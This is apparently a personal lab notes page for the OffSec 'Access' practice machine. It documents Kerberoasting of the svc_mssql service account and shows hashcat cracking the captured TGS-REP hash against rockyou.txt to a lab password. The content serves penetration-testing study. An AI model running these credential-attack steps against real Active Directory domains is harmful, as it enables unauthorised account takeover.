Kerberoasting

As part of the adPEAS script, it has identified and exploited a Kerberoast-able user, svc_mssql, for the MSSQLSvc/DC.access.offsec SPN. Interestingly, it’s set to the DC.access.offsec host

dc

PS C:\tmp> ping DC.access.offsec
Ping request could not find host DC.access.offsec. Please check the name and try again.
 
PS C:\tmp> ping dc
 
Pinging dc.local [192.168.206.149] with 32 bytes of data:
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
 
Ping statistics for 192.168.206.149:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Pinging the DC.access.offsec host failed, but dc worked to a different IP address; 192.168.206.149

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ hashcat -a 0 -m 13100 ./svc_mssql.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec*$0d542ebf9c13278b89afd3815a2e84e4$0aedd700cd0a81cd28ef7e65e1020f0a49fe7ec08761cba0f12f0264aad4bb6c523f081deb803d0dfe9250e5050d213ebafaf67faa41cf969c9c6108bcb40568c588931ae659fb9e67f8cce4e9d6207692e7222dddce64a669c87a6f56f1da98ae93cd61735e45d7de37fbeca3408ed32af5ad703a7aa0c4a8a2e2bb0e58dae965b37bdaa9060265c2839fb30d04f6349c164721e6b3287b425ac1bfa305de67c68bc6f01167555e35974e1cea255fa8898f2e3947ac76be7f179da32c439350693bbc300e3bff9f77e6b4fe8c385201d2e94bc856f0e875e0a49656e7cf7bc19aaab51f199083b478cd9bca50534b4fdf46d4dd82aed1af4c842a4b0342be636234b0803db89329cd7778a78ae313122a5929347f532f9c75a66299f7e1666d1b8bd492f463f7bbecde4fbb672373472b32be4bd021ee632dfac8239fb00de0e6a3e90268679a52c18c786f143b8053827e187e5c1bccd765fabfa12ee2c137c5f22733e60de37bec47e6bac78968a886377a1c97c50e66f6026cf9eabdc5ed1f20ea19a2738ee6cee633facc94155bf8b25a90f12d527d570b284bff7fb2c46623f272f9a6144592a984e099e269e826400567e54d86b7dd750a95ae4eb4543ac457b66378e733dc82c1af5cea704f25e68f13b7f3ca7bc28f072469649b2b365f13720b4c21c167cc876336208bfa8bec3cfe917ce288dc4ef6b6b7011b8b12e12e0376378cf61c227743971a682ab236ab42c10fd339378c576bd56ec40e8faeac30805ed00b3d57d6a5d835d3bbc5c1353e13c4fe0798bb39b9b807ba1276fadf9b86b5c4632b7ada5447efbaebd5de59b607d3b8aba1604495e3f4c4535846b96480368cf53e525ea1f82df23a5eb8c19e05b6d4c91e062c4304f2ffa183793aa6bd66bb641b042aa01831d9d85ca4e89dca437f8a73ac9c7abf192cfaaeef882b02421db193ffe892e69122e564a1d376bd310b285b72a2b36c741be58ddb392244ca6f7ddf5cceae92ebef321f2b6d853d46c6c111a83020b6bad15aa9686c2b0db15b1523f684f1c1dd3c6c82eed385cb227192b23a5a8dffd466737b949e26425c0e00c964c6523e2a11ce957c2c8e2ea8d521e04a00e96d5c49f97464509177b57d7245b9c24b5827d77d5e375c447f29e16a2b6bad6aea5ef5a14974c1dcbe5eb6539f4e5dd3aeae9f3c01876dc2c5e8bbbb4ba09ec39e88a4a251db02e41de5d12e7abf2994fb154ca328ec5fa4052dd5f66e3c64ede5b1d0b1c9b25a11d42a00bfa2f226aeed5e8f913686c7ebe5ef1437685ba8e72cb40f26ff4b188936cc6a78ab324d4d457a7df812a01a1a6e7c774b95bf8a2f7d52dacfcf36dcd7c20c12ba72da8435b4701ead652b7ea776ca3a368dbafa107dd7d9de01471b13a8e89801a706f4ae18aedfbdb11de3ac43fd0b0d467df88182121e5a201e867dc6e9b1f9be503fa80278c87c5e3a02101f4ae50b18e3c02d937d991cb84e1d6d64a09caf0f334f000aaa7b619bd415b308432a7cf998b1b71d8ee8c39b5a852819d8d5cba54b294e9e8845a9eb5f420e2a4f1ac4d99cc9d996f2d2acc9c2f82167008b578d802c94cfcd0901962e:trustno1
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.ac...01962e
Time.Started.....: Mon Apr 21 17:41:45 2025 (0 secs)
Time.Estimated...: Mon Apr 21 17:41:45 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2349.5 kH/s (1.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> hawkeye
Hardware.Mon.#1..: Util: 10%
 
Started: Mon Apr 21 17:41:44 2025
Stopped: Mon Apr 21 17:41:47 2025

TGS-REP hash cracked; trustno1 Validation is required

InfoSec LAB

Explorer

Access_Kerberoasting

Kerberoasting

dc

Password Cracking

Interactive Graph View

Table of Contents

Backlinks